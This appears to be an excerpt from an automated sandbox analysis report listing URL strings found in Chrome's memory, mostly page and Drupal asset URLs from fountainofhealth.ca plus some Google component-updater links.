Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgzb5szf7x3so2hvkfx32p7bbuq_9805/hfnkpi
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/aevtvjsxpcrwhjvp5w32fej6zq_9.56.0/gcmjkm
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/ne
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/p
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://eloan.co.jp
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://explorefledge.com
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313183913.000028EC04904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca
Source: chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378554126.000028EC08108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496495802.000028EC04980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495089287.000028EC04770000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400889050.000028EC0505C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485039398.000028EC03794000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/
Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca//
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/5-minute-cbt-course
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/7
Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/Home
Source: chrome.exe, 00000000.00000002.2499837074.000028EC06424000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/LnB1c2goVil9fSk=
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/X
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/about-us#about-foh-learning-center
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/about-us#about-foh-learning-centererdler
Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501144025.000028EC06888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/clinicians
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swjs7b
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/dialog.css?swjs7b
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320114784.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320114784.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481637546.000028EC033B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0/
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2495089287.000028EC04770000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490153719.000028EC03F40000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481637546.000028EC033B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320190791.000028EC06934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0.0
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jq
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jqery.minv=3.
Source: chrome.exe, 00000000.00000003.2342734816.000028EC063C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC57000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jquery.min.js?v=3.7.0
Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495723401.000028EC04840000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320190791.000028EC06934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2
Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490153719.000028EC03F40000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6
Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315030779.000028EC05178000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6a
Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315030779.000028EC05178000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6aDb
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497831692.000028EC04E14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/ajax.js?v=10.1.0sage.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/announce.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/debounce.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/debounce.js?v=10.1.0.js?v=4.2.0
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475340752.000028EC02C67000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0a
Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0aDb
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0bridge.js?swjs7b
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.position.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/displace.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0con.pngr
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.js?v=10.1.0er.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.js?v=10.1.0er.js?v=10.1.0.min.js?v=1.0.1
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/drupalSettingsLoader.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/jquery.tabbable.shim.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/message.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/position.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0avicon.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/align.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/clearfix.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/clearfix.module.css?swjs7bb
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/container-inline.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/hidden.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/js.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/nowrap.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/position-container.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/resize.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/sticky-header.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/sticky-header.module.css?swjs7b7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/system-status-counter.css?swjs7b
Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/system-status-report-counters.css?swj
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/tree-child.module.css?swjs7b
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/tree-child.module.css?swjs7b.css?swjs
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/modules/views/css/views-responsive-grid.css?swjs7b
Source: chrome.exe, 00000000.00000002.2495959896.000028EC048B8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/cript
Source: chrome.exe, 00000000.00000002.2499413473.000028EC06330000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475518277.000028EC02CA4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508836784.000028EC08114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362065696.000028EC06E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378748801.000028EC03845000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472109476.000028EC02820000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/en#main-content
